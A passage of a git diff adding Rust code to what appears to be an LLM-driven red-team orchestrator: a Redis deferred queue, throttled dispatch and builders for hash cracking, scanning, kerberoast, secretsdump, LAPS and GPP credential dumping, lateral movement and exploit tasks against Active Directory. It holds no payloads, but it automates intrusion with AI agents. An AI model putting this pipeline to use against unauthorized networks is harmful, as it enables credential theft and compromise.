{out_tok}){cost_str}"); + } + Ok(None) => {} + Err(e) => { + debug!("Token usage summary failed: {e}"); + } + } + } +} diff --git a/ares-cli/src/orchestrator/deferred.rs b/ares-cli/src/orchestrator/deferred.rs new file mode 100644 index 00000000..168e6e6b --- /dev/null +++ b/ares-cli/src/orchestrator/deferred.rs @@ -0,0 +1,395 @@ +//! Redis-backed deferred task queue. +//! +//! When the throttler decides to defer a task, it lands here in a ZSET keyed +//! by `ares:deferred:{operation_id}:{task_type}`. A background tokio task +//! periodically checks for tasks whose score (priority-weighted timestamp) +//! qualifies them for re-dispatch once concurrency slots open up. +//! +//! Score formula: `(priority * 1_000_000_000) + (unix_millis)` +//! Lower score = higher priority = processed first. + +use anyhow::{Context, Result}; +use chrono::Utc; +use redis::AsyncCommands; +use serde::{Deserialize, Serialize}; +use std::sync::Arc; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::task_queue::TaskQueue; +use crate::orchestrator::throttling::{ThrottleDecision, Throttler}; + +/// Redis key prefix for deferred queues (matches Python `DEFERRED_QUEUE_PREFIX`). +pub const DEFERRED_QUEUE_PREFIX: &str = "ares:deferred"; + +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct DeferredTask { + pub priority: i32, + pub enqueue_time: f64, + pub task_type: String, + pub target_role: String, + pub payload: serde_json::Value, + pub source_agent: String, +} + +impl DeferredTask { + /// ZSET score: priority bucket * 1e9 + enqueue millis. + pub fn score(&self) -> f64 { + (self.priority as f64) * 1_000_000_000.0 + self.enqueue_time * 1000.0 + } +} + +/// Manages the Redis ZSET-backed deferred queue. +pub struct DeferredQueue { + queue: TaskQueue, + config: Arc, +} + +impl DeferredQueue { + pub fn new(queue: TaskQueue, config: Arc) -> Self { + Self { queue, config } + } + + /// Redis key for the per-task-type deferred ZSET. + fn zset_key(&self, task_type: &str) -> String { + format!( + "{}:{}:{}", + DEFERRED_QUEUE_PREFIX, self.config.operation_id, task_type + ) + } + + /// Enqueue a task for later dispatch. + /// + /// Returns `true` if the task was accepted, `false` if the queue is full. + pub async fn enqueue(&self, task: &DeferredTask) -> Result { + let key = self.zset_key(&task.task_type); + + // Check per-type limit + let mut conn = self.queue_conn(); + let current_len: usize = conn.zcard(&key).await.unwrap_or(0); + if current_len >= self.config.max_deferred_per_type { + debug!( + task_type = %task.task_type, + len = current_len, + max = self.config.max_deferred_per_type, + "Deferred queue full for type" + ); + return Ok(false); + } + + let json = serde_json::to_string(task).context("Failed to serialize DeferredTask")?; + let score = task.score(); + + conn.zadd::<_, _, _, ()>(&key, &json, score) + .await + .with_context(|| format!("ZADD to {key}"))?; + + info!( + task_type = %task.task_type, + role = %task.target_role, + priority = task.priority, + score, + "Task deferred" + ); + Ok(true) + } + + /// Pop the highest-priority (lowest-score) task from any type ZSET. + /// + /// Scans all known task-type keys for this operation and picks the + /// globally lowest score. + pub async fn pop_best(&self) -> Result> { + let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id); + let mut conn = self.queue_conn(); + + // SCAN for matching keys (avoids blocking Redis with KEYS) + let keys: Vec = scan_keys_async(&mut conn, &pattern).await; + + if keys.is_empty() { + return Ok(None); + } + + // Find the globally best candidate across all type ZSETs + let mut best: Option<(String, String, f64)> = None; // (key, member, score) + + for key in &keys { + // Peek at the lowest-score member + let members: Vec<(String, f64)> = redis::cmd("ZRANGEBYSCORE") + .arg(key) + .arg("-inf") + .arg("+inf") + .arg("WITHSCORES") + .arg("LIMIT") + .arg(0) + .arg(1) + .query_async(&mut conn) + .await + .unwrap_or_default(); + + if let Some((member, score)) = members.into_iter().next() { + let dominated = best.as_ref().map(|(_, _, s)| score < *s).unwrap_or(true); + if dominated { + best = Some((key.clone(), member, score)); + } + } + } + + match best { + Some((key, member, _score)) => { + // Atomically remove it + let removed: usize = conn.zrem(&key, &member).await.unwrap_or(0); + if removed == 0 { + // Someone else grabbed it (unlikely in single-orchestrator mode) + return Ok(None); + } + let task: DeferredTask = + serde_json::from_str(&member).context("Bad DeferredTask JSON")?; + Ok(Some(task)) + } + None => Ok(None), + } + } + + /// Evict tasks older than `max_age` from all deferred ZSETs. + pub async fn evict_stale(&self) -> Result { + let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id); + let mut conn = self.queue_conn(); + let keys: Vec = scan_keys_async(&mut conn, &pattern).await; + + let max_age = self.config.deferred_task_max_age; + let cutoff = Utc::now().timestamp() as f64 - max_age.as_secs_f64(); + let mut total_evicted = 0_usize; + + for key in &keys { + // All members, check enqueue_time + let members: Vec<(String, f64)> = redis::cmd("ZRANGEBYSCORE") + .arg(key) + .arg("-inf") + .arg("+inf") + .arg("WITHSCORES") + .query_async(&mut conn) + .await + .unwrap_or_default(); + + for (member, _score) in members { + if let Ok(task) = serde_json::from_str::(&member) { + if task.enqueue_time < cutoff { + let _: usize = conn.zrem(key, &member).await.unwrap_or(0); + total_evicted += 1; + debug!( + task_type = %task.task_type, + age_secs = Utc::now().timestamp() as f64 - task.enqueue_time, + "Evicted stale deferred task" + ); + } + } + } + } + + if total_evicted > 0 { + info!(evicted = total_evicted, "Deferred queue stale eviction"); + } + Ok(total_evicted) + } + + fn queue_conn(&self) -> redis::aio::ConnectionManager { + // TaskQueue wraps a ConnectionManager which implements Clone cheaply + // We access it through an internal method. + self.queue.connection() + } +} + +/// Scan Redis keys matching a pattern using cursor iteration (avoids KEYS). +async fn scan_keys_async(conn: &mut redis::aio::ConnectionManager, pattern: &str) -> Vec { + let mut all_keys = Vec::new(); + let mut cursor: u64 = 0; + loop { + let result: Result<(u64, Vec), _> = redis::cmd("SCAN") + .arg(cursor) + .arg("MATCH") + .arg(pattern) + .arg("COUNT") + .arg(100) + .query_async(conn) + .await; + match result { + Ok((next_cursor, keys)) => { + all_keys.extend(keys); + cursor = next_cursor; + if cursor == 0 { + break; + } + } + Err(_) => break, + } + } + all_keys +} + +/// Spawn a tokio task that periodically drains the deferred queue whenever +/// the throttler allows new submissions. +/// +/// Uses `Dispatcher::do_submit()` to route tasks directly to the LLM agent +/// loop (not Redis task queues, which have no consumer in this process). +pub fn spawn_deferred_processor( + deferred: Arc, + dispatcher: Arc, + throttler: Arc, + config: Arc, + mut shutdown: watch::Receiver, +) -> tokio::task::JoinHandle<()> { + tokio::spawn(async move { + let mut interval = tokio::time::interval(config.deferred_poll_interval); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => { + info!("Deferred processor shutting down"); + break; + } + } + + // Evict stale tasks first + if let Err(e) = deferred.evict_stale().await { + warn!(err = %e, "Deferred eviction error"); + } + + // Try to drain as many as possible while slots are open + let mut dispatched = 0_u32; + loop { + let Some(task) = (match deferred.pop_best().await { + Ok(t) => t, + Err(e) => { + warn!(err = %e, "pop_best error"); + break; + } + }) else { + break; // queue empty + }; + + // Re-check throttle before submitting + let decision = throttler + .check(&task.task_type, &task.target_role, Some(&task.payload)) + .await; + + match decision { + ThrottleDecision::Allow => { + // Pre-check credential concurrency to avoid a hot + // re-enqueue loop: submit_to_llm would re-defer the + // task if the credential is at capacity, but this + // drain loop would immediately pop it again. + if let Some(cred_key) = + crate::orchestrator::dispatcher::credential_key_from_payload( + &task.payload, + ) + { + if !dispatcher.credential_inflight.can_acquire(&cred_key).await { + let _ = deferred.enqueue(&task).await; + break; + } + } + + // Route directly to the LLM agent loop via Dispatcher. + // do_submit handles tracker.add() and throttler.record_dispatch(). + match dispatcher + .do_submit( + &task.task_type, + &task.target_role, + task.payload.clone(), + task.priority, + ) + .await + { + Ok(Some(tid)) => { + dispatched += 1; + info!( + task_id = %tid, + task_type = %task.task_type, + "Deferred task dispatched" + ); + } + Ok(None) => { + // Credential concurrency block or no role mapping. + // Task may have been re-enqueued by submit_to_llm; + // break to avoid hot loop. + break; + } + Err(e) => { + warn!(err = %e, "Failed to dispatch deferred task"); + // Re-enqueue so it is not lost + let _ = deferred.enqueue(&task).await; + break; + } + } + } + ThrottleDecision::Defer | ThrottleDecision::Wait(_) => { + // Put it back; stop draining since capacity is full. + let _ = deferred.enqueue(&task).await; + break; + } + } + } + + if dispatched > 0 { + info!(dispatched, "Deferred queue drain cycle"); + } + } + }) +} + +#[cfg(test)] +mod tests { + use super::*; + + fn make_task(priority: i32, enqueue_time: f64) -> DeferredTask { + DeferredTask { + priority, + enqueue_time, + task_type: "recon".into(), + target_role: "recon".into(), + payload: serde_json::json!({}), + source_agent: "orchestrator".into(), + } + } + + #[test] + fn higher_priority_lower_score() { + let high = make_task(1, 1000.0); + let low = make_task(5, 1000.0); + assert!(high.score() < low.score()); + } + + #[test] + fn same_priority_fifo_ordering() { + let earlier = make_task(5, 1000.0); + let later = make_task(5, 1010.0); + assert!(earlier.score() < later.score()); + } + + #[test] + fn score_deterministic() { + let t = make_task(3, 1700000000.0); + assert_eq!(t.score(), t.score()); + } + + #[test] + fn priority_dominates_time_within_bucket() { + // With small time deltas (< 1s apart), priority bucket dominates + let p1_late = make_task(1, 100.010); + let p5_early = make_task(5, 100.000); + assert!(p1_late.score() < p5_early.score()); + } + + #[test] + fn deferred_task_roundtrip() { + let t = make_task(3, 1700000000.0); + let json = serde_json::to_string(&t).unwrap(); + let t2: DeferredTask = serde_json::from_str(&json).unwrap(); + assert_eq!(t.priority, t2.priority); + assert_eq!(t.task_type, t2.task_type); + assert!((t.enqueue_time - t2.enqueue_time).abs() < f64::EPSILON); + } +} diff --git a/ares-cli/src/orchestrator/dispatcher/mod.rs b/ares-cli/src/orchestrator/dispatcher/mod.rs new file mode 100644 index 00000000..baee2430 --- /dev/null +++ b/ares-cli/src/orchestrator/dispatcher/mod.rs @@ -0,0 +1,132 @@ +//! Central dispatcher — ties together task submission, throttling, and state. +//! +//! All task submission goes through `Dispatcher::throttled_submit()` which checks +//! the throttler, submits or defers, and tracks active tasks. Convenience methods +//! like `request_crack()`, `request_recon()` etc. build the correct payloads. + +mod submission; +mod task_builders; + +use std::collections::HashMap; +use std::sync::Arc; +use tokio::sync::{Mutex, Notify}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::deferred::DeferredQueue; +use crate::orchestrator::llm_runner::LlmTaskRunner; +use crate::orchestrator::routing::ActiveTaskTracker; +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueue; +use crate::orchestrator::throttling::Throttler; + +// --------------------------------------------------------------------------- +// Per-credential in-flight limiter +// --------------------------------------------------------------------------- + +/// Limits how many concurrent LLM agent loops may be in-flight for the same +/// credential. Prevents thundering-herd when only one credential has been +/// discovered and both automation loops try to spawn many tasks with it. +#[derive(Clone)] +pub struct CredentialInflight { + inner: Arc>>, + max_per_credential: usize, +} + +impl CredentialInflight { + pub fn new(max_per_credential: usize) -> Self { + Self { + inner: Arc::new(Mutex::new(HashMap::new())), + max_per_credential, + } + } + + /// Try to acquire a slot. Returns `true` if under the limit. + pub async fn try_acquire(&self, key: &str) -> bool { + let mut map = self.inner.lock().await; + let count = map.entry(key.to_string()).or_insert(0); + if *count < self.max_per_credential { + *count += 1; + true + } else { + false + } + } + + /// Check if a slot is available WITHOUT acquiring it. + pub async fn can_acquire(&self, key: &str) -> bool { + let map = self.inner.lock().await; + match map.get(key) { + Some(count) => *count < self.max_per_credential, + None => true, + } + } + + /// Release a slot when the task completes (success or failure). + pub async fn release(&self, key: &str) { + let mut map = self.inner.lock().await; + if let Some(count) = map.get_mut(key) { + *count = count.saturating_sub(1); + if *count == 0 { + map.remove(key); + } + } + } +} + +/// Extract `"user@domain"` from a task payload's `credential` field. +pub fn credential_key_from_payload(payload: &serde_json::Value) -> Option { + let cred = payload.get("credential")?; + let username = cred.get("username").and_then(|v| v.as_str())?; + let domain = cred.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + Some(format!("{}@{}", username, domain)) +} + +/// Central dispatcher for submitting tasks with throttling and routing. +pub struct Dispatcher { + pub queue: TaskQueue, + pub tracker: ActiveTaskTracker, + pub throttler: Arc, + pub deferred: Arc, + pub state: SharedState, + pub config: Arc, + /// YAML config (agent roles, vulnerability priorities, context management). + /// `None` if no YAML config file was found at startup. + pub ares_config: Option>, + /// Notifies auto_credential_access to wake up when new creds arrive. + pub credential_access_notify: Arc, + /// Notifies auto_delegation_enumeration to wake up when new creds arrive. + pub delegation_notify: Arc, + /// LLM runner — drives tasks through the Rust agent loop. + pub llm_runner: Arc, + /// Per-credential concurrency limiter. + pub credential_inflight: CredentialInflight, +} + +impl Dispatcher { + #[allow(clippy::too_many_arguments)] + pub fn new( + queue: TaskQueue, + tracker: ActiveTaskTracker, + throttler: Arc, + deferred: Arc, + state: SharedState, + config: Arc, + ares_config: Option>, + llm_runner: Arc, + ) -> Self { + Self { + queue, + tracker, + throttler, + deferred, + state, + config, + ares_config, + credential_access_notify: Arc::new(Notify::new()), + delegation_notify: Arc::new(Notify::new()), + llm_runner, + // Allow up to 3 concurrent tasks per credential + credential_inflight: CredentialInflight::new(3), + } + } +} diff --git a/ares-cli/src/orchestrator/dispatcher/submission.rs b/ares-cli/src/orchestrator/dispatcher/submission.rs new file mode 100644 index 00000000..3e132c41 --- /dev/null +++ b/ares-cli/src/orchestrator/dispatcher/submission.rs @@ -0,0 +1,450 @@ +//! Task submission — throttled_submit and do_submit. + +use std::collections::HashMap; +use std::sync::Arc; + +use anyhow::Result; +use chrono::Utc; +use serde_json::{json, Value}; +use tracing::{debug, info, warn}; + +use crate::orchestrator::deferred::DeferredTask; +use crate::orchestrator::llm_runner::LlmTaskRunner; +use crate::orchestrator::routing::ActiveTask; +use crate::orchestrator::task_queue::TaskResult; +use crate::orchestrator::throttling::ThrottleDecision; + +use ares_llm::LoopEndReason; + +use super::Dispatcher; + +impl Dispatcher { + /// Submit a task with throttle checking. Returns the task_id if submitted, + /// None if deferred or rejected. + pub async fn throttled_submit( + &self, + task_type: &str, + target_role: &str, + payload: serde_json::Value, + priority: i32, + ) -> Result> { + let decision = self + .throttler + .check(task_type, target_role, Some(&payload)) + .await; + + match decision { + ThrottleDecision::Allow => { + self.do_submit(task_type, target_role, payload, priority) + .await + } + ThrottleDecision::Defer => { + let task = DeferredTask { + priority, + enqueue_time: Utc::now().timestamp() as f64, + task_type: task_type.to_string(), + target_role: target_role.to_string(), + payload, + source_agent: "orchestrator".to_string(), + }; + match self.deferred.enqueue(&task).await { + Ok(true) => { + debug!(task_type, target_role, "Task deferred"); + Ok(None) + } + Ok(false) => { + debug!(task_type, target_role, "Deferred queue full, task dropped"); + Ok(None) + } + Err(e) => { + warn!(err = %e, "Failed to defer task, attempting direct submit"); + self.do_submit(task_type, target_role, task.payload, priority) + .await + } + } + } + ThrottleDecision::Wait(dur) => { + // Sleep and retry once + tokio::time::sleep(dur).await; + let retry_decision = self + .throttler + .check(task_type, target_role, Some(&payload)) + .await; + match retry_decision { + ThrottleDecision::Allow => { + self.do_submit(task_type, target_role, payload, priority) + .await + } + _ => { + let task = DeferredTask { + priority, + enqueue_time: Utc::now().timestamp() as f64, + task_type: task_type.to_string(), + target_role: target_role.to_string(), + payload, + source_agent: "orchestrator".to_string(), + }; + let _ = self.deferred.enqueue(&task).await; + Ok(None) + } + } + } + } + } + + /// Direct submit (bypasses throttle). Returns task_id. + /// + /// Routes the task to the Rust LLM agent loop. Prefers `target_role` + /// when it maps to a valid AgentRole (e.g. MSSQL exploit → lateral), + /// falling back to `role_for_task_type` for the default mapping. + pub async fn do_submit( + &self, + task_type: &str, + target_role: &str, + payload: serde_json::Value, + _priority: i32, + ) -> Result> { + // Prefer the caller-specified target_role (from recommended_agent) + // over the static task_type → role mapping. This lets automation + // modules like MSSQL route exploits to lateral instead of privesc. + let role = ares_llm::tool_registry::AgentRole::parse(target_role) + .or_else(|| crate::orchestrator::llm_runner::role_for_task_type(task_type)); + + let role = match role { + Some(r) => r, + None => { + warn!( + task_type = task_type, + target_role = target_role, + "No LLM role mapping for task type or target role, dropping" + ); + return Ok(None); + } + }; + + self.submit_to_llm( + self.llm_runner.clone(), + task_type, + target_role, + role, + payload, + ) + .await + } + + /// Submit a task to the Rust LLM agent loop. Spawns a background tokio + /// task and pushes the result back through the normal result queue so it + /// flows through `process_completed_task()`. + async fn submit_to_llm( + &self, + runner: Arc, + task_type: &str, + target_role: &str, + role: ares_llm::tool_registry::AgentRole, + payload: serde_json::Value, + ) -> Result> { + // Per-credential concurrency gate: if too many tasks are already + // in-flight for this credential, defer instead of spawning another. + let cred_key = super::credential_key_from_payload(&payload); + if let Some(ref key) = cred_key { + if !self.credential_inflight.try_acquire(key).await { + info!( + credential = key.as_str(), + task_type, "Credential concurrency limit reached, deferring task" + ); + let task = DeferredTask { + priority: 3, + enqueue_time: Utc::now().timestamp() as f64, + task_type: task_type.to_string(), + target_role: target_role.to_string(), + payload, + source_agent: "orchestrator".to_string(), + }; + let _ = self.deferred.enqueue(&task).await; + return Ok(None); + } + } + + let task_id = format!( + "{}_{}", + task_type, + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); + + info!( + task_id = %task_id, + task_type = task_type, + role = target_role, + "Routing task to LLM runner (Rust agent loop)" + ); + + self.tracker + .add(ActiveTask { + task_id: task_id.clone(), + task_type: task_type.to_string(), + role: target_role.to_string(), + submitted_at: std::time::Instant::now(), + }) + .await; + + self.throttler.record_dispatch().await; + + // Set initial task status with full metadata + let _ = self + .queue + .set_task_status_full( + &task_id, + "in_progress", + &self.config.operation_id, + target_role, + task_type, + Some(&payload), + ) + .await; + + // Persist pending task to Redis HASH for recovery + let now = Utc::now(); + let mut task_params: HashMap = HashMap::new(); + if let Some(ref key) = cred_key { + task_params.insert("credential_key".to_string(), serde_json::json!(key)); + } + let task_info = ares_core::models::TaskInfo { + task_id: task_id.clone(), + task_type: task_type.to_string(), + assigned_agent: target_role.to_string(), + status: ares_core::models::TaskStatus::InProgress, + created_at: now, + started_at: Some(now), + completed_at: None, + last_activity_at: now, + params: task_params, + result: None, + error: None, + retry_count: 0, + max_retries: 3, + }; + let _ = self.state.track_pending_task(&self.queue, task_info).await; + + // Capture vuln_id from exploit payloads so it survives into the result. + let vuln_id_for_result = payload + .get("vuln_id") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()); + + // Spawn the LLM agent loop as a background task + let queue = self.queue.clone(); + let tid = task_id.clone(); + let tt = task_type.to_string(); + let cred_inflight = self.credential_inflight.clone(); + let cred_key_owned = cred_key.clone(); + tokio::spawn(async move { + let outcome = runner.execute_task(&tt, &tid, role, &payload).await; + + // Token usage is now recorded incrementally per-LLM-call via + // CallbackHandler::on_token_usage — no batch recording needed here. + + // Convert outcome to TaskResult and push to result queue + let mut result = match outcome { + Ok(outcome) => { + // Merge all structured discoveries from tool results + let merged_discoveries = if outcome.discoveries.is_empty() { + None + } else { + Some(ares_tools::parsers::merge_discoveries(&outcome.discoveries)) + }; + + // Collect raw tool outputs for secondary regex extraction + let tool_outputs_json: Vec = outcome + .tool_outputs + .iter() + .map(|s| Value::String(s.clone())) + .collect(); + + match &outcome.reason { + LoopEndReason::TaskComplete { result, .. } => { + // The result may be a JSON string (serialized object from + // the LLM) or plain text. If it parses as JSON, merge its + // fields into the result payload so extract_discoveries() + // can find any LLM-reported hosts/credentials. + let mut result_json = + if let Ok(parsed) = serde_json::from_str::(result) { + if parsed.is_object() { + let mut obj = parsed; + obj["steps"] = json!(outcome.steps); + obj["tool_calls"] = json!(outcome.tool_calls_dispatched); + obj + } else { + json!({ + "summary": result, + "steps": outcome.steps, + "tool_calls": outcome.tool_calls_dispatched, + }) + } + } else { + json!({ + "summary": result, + "steps": outcome.steps, + "tool_calls": outcome.tool_calls_dispatched, + }) + }; + // Overwrite "discoveries" with parser-extracted data only. + // The LLM's task_complete result is untrusted prose — + // any discovery-like keys it contains are ignored. + // Only ares-tools parsers (run on real tool stdout) + // produce authoritative discoveries. + if let Some(obj) = result_json.as_object_mut() { + obj.remove("discoveries"); + } + if let Some(disc) = merged_discoveries { + result_json["discoveries"] = disc; + } + if !tool_outputs_json.is_empty() { + result_json["tool_outputs"] = + Value::Array(tool_outputs_json.clone()); + } + TaskResult { + task_id: tid.clone(), + success: true, + result: Some(result_json), + error: None, + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + } + } + LoopEndReason::RequestAssistance { issue, context } => { + let mut result_json = json!({ + "steps": outcome.steps, + "tool_calls": outcome.tool_calls_dispatched, + }); + if let Some(disc) = merged_discoveries { + result_json["discoveries"] = disc; + } + if !tool_outputs_json.is_empty() { + result_json["tool_outputs"] = + Value::Array(tool_outputs_json.clone()); + } + TaskResult { + task_id: tid.clone(), + success: false, + result: Some(result_json), + error: Some(format!( + "Assistance needed: {issue} (context: {context})" + )), + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + } + } + LoopEndReason::MaxSteps => { + let mut result_json = json!({ + "steps": outcome.steps, + "tool_calls": outcome.tool_calls_dispatched, + }); + if let Some(disc) = merged_discoveries { + result_json["discoveries"] = disc; + } + if !tool_outputs_json.is_empty() { + result_json["tool_outputs"] = + Value::Array(tool_outputs_json.clone()); + } + TaskResult { + task_id: tid.clone(), + success: false, + result: Some(result_json), + error: Some("Agent hit max steps limit".into()), + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + } + } + LoopEndReason::EndTurn { content } => { + let mut result_json = json!({"summary": content}); + if let Some(disc) = merged_discoveries { + result_json["discoveries"] = disc; + } + if !tool_outputs_json.is_empty() { + result_json["tool_outputs"] = + Value::Array(tool_outputs_json.clone()); + } + TaskResult { + task_id: tid.clone(), + success: true, + result: Some(result_json), + error: None, + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + } + } + LoopEndReason::MaxTokens => { + let mut result_json = json!({ + "steps": outcome.steps, + "tool_calls": outcome.tool_calls_dispatched, + }); + if let Some(disc) = merged_discoveries { + result_json["discoveries"] = disc; + } + if !tool_outputs_json.is_empty() { + result_json["tool_outputs"] = + Value::Array(tool_outputs_json.clone()); + } + TaskResult { + task_id: tid.clone(), + success: false, + result: Some(result_json), + error: Some("Agent hit max tokens".into()), + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + } + } + LoopEndReason::Error(err) => TaskResult { + task_id: tid.clone(), + success: false, + result: None, + error: Some(err.clone()), + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + }, + } + } + Err(e) => TaskResult { + task_id: tid.clone(), + success: false, + result: None, + error: Some(format!("LLM runner error: {e}")), + completed_at: Some(Utc::now()), + worker_pod: Some("rust-llm-runner".into()), + agent_name: Some(tt.clone()), + }, + }; + + // Inject vuln_id into result so process_completed_task can mark_exploited. + if let Some(ref vid) = vuln_id_for_result { + if let Some(ref mut res) = result.result { + if let Some(obj) = res.as_object_mut() { + obj.insert("vuln_id".to_string(), json!(vid)); + } + } + } + + // Release per-credential concurrency slot + if let Some(ref key) = cred_key_owned { + cred_inflight.release(key).await; + } + + // Push result to the normal result queue so the result consumer picks it up + if let Err(e) = queue.send_result(&tid, &result).await { + warn!( + task_id = %tid, + err = %e, + "Failed to push LLM task result to Redis" + ); + } + }); + + Ok(Some(task_id)) + } +} diff --git a/ares-cli/src/orchestrator/dispatcher/task_builders.rs b/ares-cli/src/orchestrator/dispatcher/task_builders.rs new file mode 100644 index 00000000..1c04f2f8 --- /dev/null +++ b/ares-cli/src/orchestrator/dispatcher/task_builders.rs @@ -0,0 +1,463 @@ +//! Convenience methods for common task types (request_crack, request_recon, etc.). + +use anyhow::Result; +use serde_json::json; +use tracing::{debug, info}; + +use crate::orchestrator::state::DEDUP_SCANNED_TARGETS; + +use super::Dispatcher; + +impl Dispatcher { + /// Submit a crack task for a hash. + pub async fn request_crack(&self, hash: &ares_core::models::Hash) -> Result> { + let payload = json!({ + "hash_type": hash.hash_type, + "hash_value": hash.hash_value, + "username": hash.username, + "domain": hash.domain, + }); + // Crack tasks are non-LLM, normal priority + self.throttled_submit("crack", "cracker", payload, 5).await + } + + /// Submit a recon task. + /// + /// Guards (mirroring Python's `request_recon` in `routing.py`): + /// 1. Skip entirely if domain admin has been achieved + /// 2. Skip nmap tasks if all targets are already in `scanned_targets` + /// 3. Auto-dispatch nmap prerequisite before enumeration if targets not scanned + pub async fn request_recon( + &self, + target_ip: &str, + domain: &str, + techniques: &[&str], + credential: Option<&ares_core::models::Credential>, + ) -> Result> { + // Guard 1: Skip recon if domain admin already achieved + { + let state = self.state.read().await; + if state.has_domain_admin { + debug!( + target_ip = target_ip, + "Skipping recon — domain admin already achieved" + ); + return Ok(None); + } + } + + let is_nmap = techniques.contains(&"network_scan") || techniques.contains(&"nmap_scan"); + let is_smb_signing = techniques.contains(&"smb_signing_check"); + let is_scan_only = (is_nmap || is_smb_signing) + && techniques + .iter() + .all(|t| *t == "network_scan" || *t == "nmap_scan" || *t == "smb_signing_check"); + + // Guard 2: Skip nmap/scan tasks if target already scanned + if is_scan_only { + let state = self.state.read().await; + if state.is_processed(DEDUP_SCANNED_TARGETS, target_ip) { + debug!( + target_ip = target_ip, + "Skipping scan — target already in scanned_targets" + ); + return Ok(None); + } + } + + // Guard 3: Auto-dispatch nmap prerequisite before enumeration + // If this is NOT a scan task and the target hasn't been scanned yet, + // dispatch an nmap scan first at priority 1 (urgent). + if !is_scan_only { + let needs_scan = { + let state = self.state.read().await; + !state.is_processed(DEDUP_SCANNED_TARGETS, target_ip) + }; + if needs_scan { + info!( + target_ip = target_ip, + "Auto-dispatching nmap prerequisite before enumeration" + ); + let scan_payload = json!({ + "target_ip": target_ip, + "domain": domain, + "techniques": ["network_scan", "smb_signing_check"], + }); + // Priority 1 = urgent, scanned before the enumeration task + let _ = self + .throttled_submit("recon", "recon", scan_payload, 1) + .await; + } + } + + // Mark nmap targets as scanned (optimistic, to prevent duplicate dispatches) + if is_nmap { + { + let mut state = self.state.write().await; + state.mark_processed(DEDUP_SCANNED_TARGETS, target_ip.to_string()); + } + // Persist to Redis so it survives restarts + let _ = self + .state + .persist_dedup(&self.queue, DEDUP_SCANNED_TARGETS, target_ip) + .await; + } + + let mut payload = json!({ + "target_ip": target_ip, + "domain": domain, + "techniques": techniques, + }); + if let Some(cred) = credential { + payload["credential"] = json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + } + + // Nmap tasks get priority 1, other recon priority 5 + let priority = if is_nmap { 1 } else { 5 }; + self.throttled_submit("recon", "recon", payload, priority) + .await + } + + /// Submit a low-hanging fruit credential discovery task (SYSVOL, GPP, LDAP, LAPS). + /// + /// Mirrors Python's fast credential discovery dispatch: sends multiple high-success-rate + /// techniques in a single task so the LLM agent executes them sequentially. + pub async fn request_low_hanging_fruit( + &self, + target_ip: &str, + domain: &str, + credential: &ares_core::models::Credential, + priority: i32, + ) -> Result> { + let payload = json!({ + "techniques": [ + "sysvol_script_search", + "gpp_password_finder", + "ldap_search_descriptions", + "laps_dump" + ], + "reason": "low_hanging_fruit", + "target_ip": target_ip, + "domain": domain, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("credential_access", "credential_access", payload, priority) + .await + } + + /// Submit a credential access task (kerberoast, asrep, secretsdump, etc.). + pub async fn request_credential_access( + &self, + technique: &str, + target_ip: &str, + domain: &str, + credential: &ares_core::models::Credential, + priority: i32, + ) -> Result> { + let payload = json!({ + "technique": technique, + "target_ip": target_ip, + "domain": domain, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("credential_access", "credential_access", payload, priority) + .await + } + + /// Submit a secretsdump task. + pub async fn request_secretsdump( + &self, + target_ip: &str, + credential: &ares_core::models::Credential, + priority: i32, + ) -> Result> { + let payload = json!({ + "technique": "secretsdump", + "target_ip": target_ip, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("credential_access", "credential_access", payload, priority) + .await + } + + /// Submit a lateral movement task. + pub async fn request_lateral( + &self, + target_ip: &str, + credential: &ares_core::models::Credential, + technique: &str, + ) -> Result> { + let payload = json!({ + "technique": technique, + "target_ip": target_ip, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("lateral_movement", "lateral", payload, 5) + .await + } + + /// Submit an exploit task for a vulnerability. + /// + /// Looks up the best available credential or hash for the vuln's target/domain + /// and attaches it to the payload so the agent doesn't have to discover auth independently. + pub async fn request_exploit( + &self, + vuln: &ares_core::models::VulnerabilityInfo, + priority: i32, + ) -> Result> { + let mut payload = json!({ + "vuln_id": vuln.vuln_id, + "vuln_type": vuln.vuln_type, + "target": vuln.target, + "details": vuln.details, + }); + + // Look up credentials for this exploit from state + { + let state = self.state.read().await; + + // Try account_name from vuln details first, then fall back to any cred for the target domain + let account_name = vuln + .details + .get("account_name") + .and_then(|v| v.as_str()) + .or_else(|| vuln.details.get("AccountName").and_then(|v| v.as_str())); + + let domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or(""); + + // Try to find a matching credential + let cred = if let Some(acct) = account_name { + state + .credentials + .iter() + .find(|c| c.username.to_lowercase() == acct.to_lowercase()) + } else { + None + } + .or_else(|| { + // Fall back to any non-delegation credential for the vuln's domain + if !domain.is_empty() { + state.credentials.iter().find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_delegation_account(&c.username) + }) + } else { + // Fall back to first available non-delegation credential + state + .credentials + .iter() + .find(|c| 